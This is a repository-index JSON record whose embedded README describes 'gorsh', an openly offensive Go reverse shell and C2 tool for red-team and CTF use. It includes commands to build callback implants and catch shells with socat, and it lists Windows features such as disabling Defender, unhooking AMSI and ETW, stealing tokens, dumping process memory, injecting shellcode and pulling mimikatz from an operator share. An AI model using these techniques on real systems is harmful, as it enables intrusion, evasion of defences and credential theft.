{"id":13825845,"url":"https://github.com/audibleblink/gorsh","last_synced_at":"2025-04-05T23:12:17.013Z","repository":{"id":43580284,"uuid":"147896803","full_name":"audibleblink/gorsh","owner":"audibleblink","description":"A Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface","archived":false,"fork":false,"pushed_at":"2024-12-12T00:35:53.000Z","size":9649,"stargazers_count":86,"open_issues_count":1,"forks_count":23,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-29T22:11:11.662Z","etag":null,"topics":["c2","golang","infosec","redteam","reverse-shell","reverseshell","security","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/audibleblink.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-09-08T03:15:37.000Z","updated_at":"2025-01-13T07:55:03.000Z","dependencies_parsed_at":"2024-01-07T22:48:51.422Z","dependency_job_id":"cfae9e22-ca10-4a23-b482-3c61410bc7ee","html_url":"https://github.com/audibleblink/gorsh","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/audibleblink","download_url":"https://codeload.github.com/audibleblink/gorsh/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247411239,"owners_count":20934653,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2","golang","infosec","redteam","reverse-shell","reverseshell","security","security-tools"],"created_at":"2024-08-04T09:01:27.904Z","updated_at":"2025-04-05T23:12:16.980Z","avatar_url":"https://github.com/audibleblink.png","language":"Shell","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","Shell","security-tools"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"readme":"# gorsh\n\n[go]lang [r]everse [sh]ell\n\n[![forthebadge](https://forthebadge.com/images/badges/fuck-it-ship-it.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/no-ragrets.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/contains-technical-debt.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/made-with-crayons.svg)](https://forthebadge.com)\n\n![](https://i.imgur.com/x51XH6K.png)\n[![asciicast](https://asciinema.org/a/NmeC42TNu8BgdjMLcyVUXo74x.svg)](https://asciinema.org/a/NmeC42TNu8BgdjMLcyVUXo74x)\n\n\n\n## Usage\n\nGenerate agents with:\n\n```bash\n# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.\n$ make {windows,macos,linux} LHOST=example.com LPORT=443\n```\n\nGenerate the server with:\n\n```bash\n# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.\n$ make server LPORT=443\n```\n\nGen everything with `make all LHOST=example.com LPORT=443`\n\n### Catching the shell\n\n```bash\nmake listen LPORT=443\n```\n\nTmux is powerful terminal multiplexer with robust session/windows/pane management. \nIt works better at managing multiple reverse shells than most shell managers I've seen.\nThe server binary creates a tmux session per host and a window per each reverse shell binary invocation.\nIf you run the `spawn` command on a shell, a new window will open in the host's session, creating a \"tab\".\n\nTo catch a shell without `gorsh-server` and/or tmux, use:\n\n```bash\nsocat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE\n```\n\n## Features\n\n- Network scanner\n- Ligolo-ng tunnels for socks-less pivoting\n- Tab completion (dependent on exec method)\n- Duplicate your shells with 'spawn'\n\n### Windows\n- Disable Defender (or any process) by demoting process tokens to untrusted.\n- Execute Assembly - assemblies are gzipped \u0026 embedded. No hosting necessary\n- Unhook modules (w/ builtins for AMSI and ETW)\n- steal_token / revtoself\n- getsystem - if admin\n- minidump any process (uses comsvcs.dll)\n- shellcode injection\n- can fetch and inject meterpreter tcp and http stages\n    - or any other shellcode that follows the metasploit staging protocol\n    - first 4 bytes indicating the size of the following payload\n        - `[size][payload]`\n\n#### Not Windows\n- `setuid`, useful for UID spoofing to bypass NFS \"ACLs\"\n- Enumeration scripts\n    - linpeas\n    - linenum\n\n### Execute Assembly\n\nAssemblies are gzipped and embedded within the implant. Since this is a CTF\nshell, I'm optimizing for ease of use and not tradecraft.\n\n- `make list-assemblies` will show available assemblies from Flangvik's SharpCollection project.\n- `make choose-assemblies` will bring up fzf, where you can filter and choose\nwhat assemblies you want embedded. They will be embedded at the next build\ntime.\n- to embed any other assemblies not in SharpCollection. gzip it and copy it to `./pkg/execute_assembly/embed/`\n\n### Ligolo-NG Tunnels\n\nAgents have the ligolo client embedded. Run `make start-ligolo` to prepare\ninterfaces and run ligolo-ng. From an agent, run `pivot` and a callback should\nland within the ligolo interface. Select the callback in ligolo and `start`\nrouting. On your box, create a route to the remote network through the `tun`\ninterface and all traffic to that destination will now egress through ligolo.\n\n```bash\nip route add 172.16.43.0/24 dev ligolo`\n```\n\n### File upload/download\n\nSince this is a reverse shell, only sharing its stdin/out/err through a network socket, \ntraditional methods of uploading and downloading file aren't available. There's\na docker smb server to bridge that gap. Configure the directories to be shared\nin the `Makefile`, then run `make start-smb`. If you wish to see logs so you\ncan monitor callbacks, use `make smblogs`. Windows implants understand UNC\npaths, so something like `cp //myip/tools/mimikatz.exe .` is possible.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faudibleblink%2Fgorsh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Faudibleblink%2Fgorsh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faudibleblink%2Fgorsh/lists"}